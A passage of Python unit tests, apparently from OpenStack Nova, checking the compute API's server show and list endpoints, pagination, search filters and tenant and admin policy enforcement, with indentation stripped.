self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
addr = '10.0.0.1'
requested_networks = [{'uuid': network,
'fixed_ip': addr,
'port': port}]
self.assertRaises(
webob.exc.HTTPBadRequest,
self.controller._get_requested_networks,
requested_networks)
def test_requested_networks_neutronv2_disabled_with_port(self):
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port}]
self.assertRaises(
webob.exc.HTTPBadRequest,
self.controller._get_requested_networks,
requested_networks)
def test_requested_networks_api_enabled_with_v2_subclass(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_requested_networks_neutronv2_subclass_with_port(self):
cls = 'nova.tests.api.openstack.compute.test_servers.NeutronV2Subclass'
self.flags(network_api_class=cls)
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_get_server_by_uuid(self):
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
res_dict = self.controller.show(req, FAKE_UUID)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
def test_get_server_joins_pci_devices(self):
self.expected_attrs = None
def fake_get(_self, *args, **kwargs):
self.expected_attrs = kwargs['expected_attrs']
ctxt = context.RequestContext('fake', 'fake')
return fake_instance.fake_instance_obj(ctxt)
self.stubs.Set(compute_api.API, 'get', fake_get)
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
self.controller.show(req, FAKE_UUID)
self.assertIn('pci_devices', self.expected_attrs)
def test_unique_host_id(self):
"""Create two servers with the same host and different
project_ids and check that the host_id's are unique.
"""
def return_instance_with_host(self, *args, **kwargs):
project_id = str(uuid.uuid4())
return fakes.stub_instance(id=1, uuid=FAKE_UUID,
project_id=project_id,
host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid',
return_instance_with_host)
self.stubs.Set(db, 'instance_get',
return_instance_with_host)
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
server1 = self.controller.show(req, FAKE_UUID)
server2 = self.controller.show(req, FAKE_UUID)
self.assertNotEqual(server1['server']['hostId'],
server2['server']['hostId'])
def _get_server_data_dict(self, uuid, image_bookmark, flavor_bookmark,
status="ACTIVE", progress=100):
return {
"server": {
"id": uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": progress,
"name": "server1",
"status": status,
"hostId": '',
"image": {
"id": "10",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {
"seq": "1",
},
"links": [
{
"rel": "self",
"href": "http://localhost/v3/servers/%s" % uuid,
},
{
"rel": "bookmark",
"href": "http://localhost/servers/%s" % uuid,
},
],
}
}
def test_get_server_by_id(self):
self.flags(use_ipv6=True)
image_bookmark = "http://localhost/images/10"
flavor_bookmark = "http://localhost/flavors/1"
uuid = FAKE_UUID
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
res_dict = self.controller.show(req, uuid)
expected_server = self._get_server_data_dict(uuid,
image_bookmark,
flavor_bookmark,
status="BUILD",
progress=0)
self.assertThat(res_dict, matchers.DictMatches(expected_server))
def test_get_server_with_active_status_by_id(self):
image_bookmark = "http://localhost/images/10"
flavor_bookmark = "http://localhost/flavors/1"
new_return_server = fakes.fake_instance_get(
vm_state=vm_states.ACTIVE, progress=100)
self.stubs.Set(db, 'instance_get_by_uuid', new_return_server)
uuid = FAKE_UUID
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
res_dict = self.controller.show(req, uuid)
expected_server = self._get_server_data_dict(uuid,
image_bookmark,
flavor_bookmark)
self.assertThat(res_dict, matchers.DictMatches(expected_server))
def test_get_server_with_id_image_ref_by_id(self):
image_ref = "10"
image_bookmark = "http://localhost/images/10"
flavor_id = "1"
flavor_bookmark = "http://localhost/flavors/1"
new_return_server = fakes.fake_instance_get(
vm_state=vm_states.ACTIVE, image_ref=image_ref,
flavor_id=flavor_id, progress=100)
self.stubs.Set(db, 'instance_get_by_uuid', new_return_server)
uuid = FAKE_UUID
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
res_dict = self.controller.show(req, uuid)
expected_server = self._get_server_data_dict(uuid,
image_bookmark,
flavor_bookmark)
self.assertThat(res_dict, matchers.DictMatches(expected_server))
def test_get_server_addresses_from_cache(self):
pub0 = ('172.19.0.1', '172.19.0.2',)
pub1 = ('1.2.3.4',)
pub2 = ('b33f::fdee:ddff:fecc:bbaa',)
priv0 = ('192.168.0.3', '192.168.0.4',)
def _ip(ip):
return {'address': ip, 'type': 'fixed'}
nw_cache = [
{'address': 'aa:aa:aa:aa:aa:aa',
'id': 1,
'network': {'bridge': 'br0',
'id': 1,
'label': 'public',
'subnets': [{'cidr': '172.19.0.0/24',
'ips': [_ip(ip) for ip in pub0]},
{'cidr': '1.2.3.0/16',
'ips': [_ip(ip) for ip in pub1]},
{'cidr': 'b33f::/64',
'ips': [_ip(ip) for ip in pub2]}]}},
{'address': 'bb:bb:bb:bb:bb:bb',
'id': 2,
'network': {'bridge': 'br1',
'id': 2,
'label': 'private',
'subnets': [{'cidr': '192.168.0.0/24',
'ips': [_ip(ip) for ip in priv0]}]}}]
return_server = fakes.fake_instance_get(nw_cache=nw_cache)
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
req = fakes.HTTPRequestV3.blank('/servers/%s/ips' % FAKE_UUID)
res_dict = self.ips_controller.index(req, FAKE_UUID)
expected = {
'addresses': {
'private': [
{'version': 4, 'addr': '192.168.0.3',
'type': 'fixed', 'mac_addr': 'bb:bb:bb:bb:bb:bb'},
{'version': 4, 'addr': '192.168.0.4',
'type': 'fixed', 'mac_addr': 'bb:bb:bb:bb:bb:bb'},
],
'public': [
{'version': 4, 'addr': '172.19.0.1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 4, 'addr': '172.19.0.2',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 4, 'addr': '1.2.3.4',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': 'b33f::fdee:ddff:fecc:bbaa',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
],
},
}
self.assertThat(res_dict, matchers.DictMatches(expected))
def test_get_server_addresses_nonexistent_network(self):
url = '/v3/servers/%s/ips/network_0' % FAKE_UUID
req = fakes.HTTPRequestV3.blank(url)
self.assertRaises(webob.exc.HTTPNotFound, self.ips_controller.show,
req, FAKE_UUID, 'network_0')
def test_get_server_addresses_nonexistent_server(self):
def fake_instance_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get)
server_id = str(uuid.uuid4())
req = fakes.HTTPRequestV3.blank('/servers/%s/ips' % server_id)
self.assertRaises(webob.exc.HTTPNotFound,
self.ips_controller.index, req, server_id)
def test_get_server_list_empty(self):
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers_empty)
req = fakes.HTTPRequestV3.blank('/servers')
res_dict = self.controller.index(req)
num_servers = len(res_dict['servers'])
self.assertEqual(0, num_servers)
def test_get_server_list_with_reservation_id(self):
req = fakes.HTTPRequestV3.blank('/servers?reservation_id=foo')
res_dict = self.controller.index(req)
i = 0
for s in res_dict['servers']:
self.assertEqual(s.get('name'), 'server%d' % (i + 1))
i += 1
def test_get_server_list_with_reservation_id_empty(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?'
'reservation_id=foo')
res_dict = self.controller.detail(req)
i = 0
for s in res_dict['servers']:
self.assertEqual(s.get('name'), 'server%d' % (i + 1))
i += 1
def test_get_server_list_with_reservation_id_details(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?'
'reservation_id=foo')
res_dict = self.controller.detail(req)
i = 0
for s in res_dict['servers']:
self.assertEqual(s.get('name'), 'server%d' % (i + 1))
i += 1
def test_get_server_list(self):
req = fakes.HTTPRequestV3.blank('/servers')
res_dict = self.controller.index(req)
self.assertEqual(len(res_dict['servers']), 5)
for i, s in enumerate(res_dict['servers']):
self.assertEqual(s['id'], fakes.get_fake_uuid(i))
self.assertEqual(s['name'], 'server%d' % (i + 1))
self.assertIsNone(s.get('image', None))
expected_links = [
{
"rel": "self",
"href": "http://localhost/v3/servers/%s" % s['id'],
},
{
"rel": "bookmark",
"href": "http://localhost/servers/%s" % s['id'],
},
]
self.assertEqual(s['links'], expected_links)
def test_get_servers_with_limit(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=3')
res_dict = self.controller.index(req)
servers = res_dict['servers']
self.assertEqual([s['id'] for s in servers],
[fakes.get_fake_uuid(i) for i in xrange(len(servers))])
servers_links = res_dict['servers_links']
self.assertEqual(servers_links[0]['rel'], 'next')
href_parts = urlparse.urlparse(servers_links[0]['href'])
self.assertEqual('/v3/servers', href_parts.path)
params = urlparse.parse_qs(href_parts.query)
expected_params = {'limit': ['3'],
'marker': [fakes.get_fake_uuid(2)]}
self.assertThat(params, matchers.DictMatches(expected_params))
def test_get_servers_with_limit_bad_value(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=aaa')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_get_server_details_empty(self):
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers_empty)
req = fakes.HTTPRequestV3.blank('/servers/detail')
res_dict = self.controller.detail(req)
num_servers = len(res_dict['servers'])
self.assertEqual(0, num_servers)
def test_get_server_details_with_limit(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?limit=3')
res = self.controller.detail(req)
servers = res['servers']
self.assertEqual([s['id'] for s in servers],
[fakes.get_fake_uuid(i) for i in xrange(len(servers))])
servers_links = res['servers_links']
self.assertEqual(servers_links[0]['rel'], 'next')
href_parts = urlparse.urlparse(servers_links[0]['href'])
self.assertEqual('/v3/servers/detail', href_parts.path)
params = urlparse.parse_qs(href_parts.query)
expected = {'limit': ['3'], 'marker': [fakes.get_fake_uuid(2)]}
self.assertThat(params, matchers.DictMatches(expected))
def test_get_server_details_with_limit_bad_value(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?limit=aaa')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.detail, req)
def test_get_server_details_with_limit_and_other_params(self):
req = fakes.HTTPRequestV3.blank('/servers/detail'
'?limit=3&blah=2:t')
res = self.controller.detail(req)
servers = res['servers']
self.assertEqual([s['id'] for s in servers],
[fakes.get_fake_uuid(i) for i in xrange(len(servers))])
servers_links = res['servers_links']
self.assertEqual(servers_links[0]['rel'], 'next')
href_parts = urlparse.urlparse(servers_links[0]['href'])
self.assertEqual('/v3/servers/detail', href_parts.path)
params = urlparse.parse_qs(href_parts.query)
expected = {'limit': ['3'], 'blah': ['2:t'],
'marker': [fakes.get_fake_uuid(2)]}
self.assertThat(params, matchers.DictMatches(expected))
def test_get_servers_with_too_big_limit(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=30')
res_dict = self.controller.index(req)
self.assertNotIn('servers_links', res_dict)
def test_get_servers_with_bad_limit(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=asdf')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_get_servers_with_marker(self):
url = '/v3/servers?marker=%s' % fakes.get_fake_uuid(2)
req = fakes.HTTPRequestV3.blank(url)
servers = self.controller.index(req)['servers']
self.assertEqual([s['name'] for s in servers], ["server4", "server5"])
def test_get_servers_with_limit_and_marker(self):
url = '/v3/servers?limit=2&marker=%s' % fakes.get_fake_uuid(1)
req = fakes.HTTPRequestV3.blank(url)
servers = self.controller.index(req)['servers']
self.assertEqual([s['name'] for s in servers], ['server3', 'server4'])
def test_get_servers_with_bad_marker(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=2&marker=asdf')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_get_servers_with_bad_option(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?unknownoption=whee')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_image(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('image', search_opts)
self.assertEqual(search_opts['image'], '12345')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?image=12345')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_tenant_id_filter_converts_to_project_id_for_admin(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertIsNotNone(filters)
self.assertEqual(filters['project_id'], 'newfake')
self.assertFalse(filters.get('tenant_id'))
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers'
'?all_tenants=1&tenant_id=newfake',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_tenant_id_filter_no_admin_context(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotEqual(filters, None)
self.assertEqual(filters['project_id'], 'fake')
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?tenant_id=newfake')
res = self.controller.index(req)
self.assertIn('servers', res)
def test_tenant_id_filter_implies_all_tenants(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotEqual(filters, None)
# The project_id assertion checks that the project_id
# filter is set to that specified in the request url and
# not that of the context, verifying that the all_tenants
# flag was enabled
self.assertEqual(filters['project_id'], 'newfake')
self.assertFalse(filters.get('tenant_id'))
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?tenant_id=newfake',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_normal(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('project_id', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_one(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('project_id', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=1',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_zero(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('all_tenants', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=0',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_false(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('all_tenants', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=false',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_invalid(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None,
expected_attrs=None):
self.assertNotIn('all_tenants', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=xxx',
use_admin_context=True)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_admin_restricted_tenant(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertIsNotNone(filters)
self.assertEqual(filters['project_id'], 'fake')
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_pass_policy(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertIsNotNone(filters)
self.assertNotIn('project_id', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
rules = {
"compute:get_all_tenants":
common_policy.parse_rule("project_id:fake"),
"compute:get_all":
common_policy.parse_rule("project_id:fake"),
}
policy.set_rules(rules)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=1')
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_fail_policy(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None):
self.assertIsNotNone(filters)
return [fakes.stub_instance(100)]
rules = {
"compute:get_all_tenants":
common_policy.parse_rule("project_id:non_fake"),
"compute:get_all":
common_policy.parse_rule("project_id:fake"),
}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=1')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller.index, req)
def test_get_servers_allows_flavor(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('flavor', search_opts)
# flavor is an integer ID
self.assertEqual(search_opts['flavor'], '12345')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?flavor=12345')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_with_bad_flavor(self):
req = fakes.HTTPRequestV3.blank('/servers?flavor=abcde')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 0)
def test_get_server_details_with_bad_flavor(self):
req = fakes.HTTPRequestV3.blank('/servers?flavor=abcde')
servers = self.controller.detail(req)['servers']
self.assertThat(servers, testtools.matchers.HasLength(0))
def test_get_servers_allows_status(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('vm_state', search_opts)
self.assertEqual(search_opts['vm_state'], [vm_states.ACTIVE])
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=active')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_task_status(self):
server_uuid = str(uuid.uuid4())
task_state = task_states.REBOOTING
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('task_state', search_opts)
self.assertEqual([task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED,
task_states.REBOOTING],
search_opts['task_state'])
db_list = [fakes.stub_instance(100, uuid=server_uuid,
task_state=task_state)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=reboot')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_resize_status(self):
# Test when resize status, it maps list of vm states.
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIn('vm_state', search_opts)
self.assertEqual(search_opts['vm_state'],
[vm_states.ACTIVE, vm_states.STOPPED])
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=resize')
servers = self.controller.detail(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_invalid_status(self):
# Test getting servers by invalid status.
req = fakes.HTTPRequestV3.blank('/servers?status=baloney',
use_admin_context=False)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 0)
def test_get_servers_deleted_status_as_user(self):
req = fakes.HTTPRequestV3.blank('/servers?status=deleted',
use_admin_context=False)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.detail, req)
def test_get_servers_deleted_status_as_admin(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIn('vm_state', search_opts)
self.assertEqual(search_opts['vm_state'], ['deleted'])
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=deleted',
use_admin_context=True)
servers = self.controller.detail(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_name(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('name', search_opts)
self.assertEqual(search_opts['name'], 'whee.*')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?name=whee.*')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_changes_since(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('changes-since', search_opts)
changes_since = datetime.datetime(2011, 1, 24, 17, 8, 1,
tzinfo=iso8601.iso8601.UTC)
self.assertEqual(search_opts['changes-since'], changes_since)
self.assertNotIn('deleted', search_opts)
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
params = 'changes-since=2011-01-24T17:08:01Z'
req = fakes.HTTPRequestV3.blank('/servers?%s' % params)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_changes_since_bad_value(self):
params = 'changes-since=asdf'
req = fakes.HTTPRequestV3.blank('/servers?%s' % params)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.index, req)
def test_get_servers_admin_filters_as_user(self):
"""Test getting servers by admin-only or unknown options when
context is not admin. Make sure the admin and unknown options
are stripped before they get to compute_api.get_all()
"""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
# Allowed by user
self.assertIn('name', search_opts)
self.assertIn('ip', search_opts)
# OSAPI converts status to vm_state
self.assertIn('vm_state', search_opts)
# Allowed only by admins with admin API on
self.assertNotIn('unknown_option', search_opts)
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
query_str = "name=foo&ip=10.*&status=active&unknown_option=meow"
req = fakes.HTTPRequest.blank('/servers?%s' % query_str)
res = self.controller.index(req)
servers = res['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_admin_options_as_admin(self):
"""Test getting servers by admin-only or unknown options when
context is admin. All options should be passed
"""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
# Allowed by user
self.assertIn('name', search_opts)
# OSAPI converts status to vm_state
self.assertIn('vm_state', search_opts)
# Allowed only by admins with admin API on
self.assertIn('ip', search_opts)
self.assertIn('unknown_option', search_opts)
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
query_str = "name=foo&ip=10.*&status=active&unknown_option=meow"
req = fakes.HTTPRequestV3.blank('/servers?%s' % query_str,
use_admin_context=True)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_ip(self):
"""Test getting servers by ip."""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('ip', search_opts)
self.assertEqual(search_opts['ip'], '10\..*')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?ip=10\..*')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_admin_allows_ip6(self):
"""Test getting servers by ip6 with admin_api enabled and
admin context
"""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('ip6', search_opts)
self.assertEqual(search_opts['ip6'], 'ffff.*')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?ip6=ffff.*',
use_admin_context=True)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_all_server_details(self):
expected_flavor = {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": 'http://localhost/flavors/1',
},
],
}
expected_image = {
"id": "10",
"links": [
{
"rel": "bookmark",
"href": 'http://localhost/images/10',
},
],
}
req = fakes.HTTPRequestV3.blank('/servers/detail')
res_dict = self.controller.detail(req)
for i, s in enumerate(res_dict['servers']):
self.assertEqual(s['id'], fakes.get_fake_uuid(i))
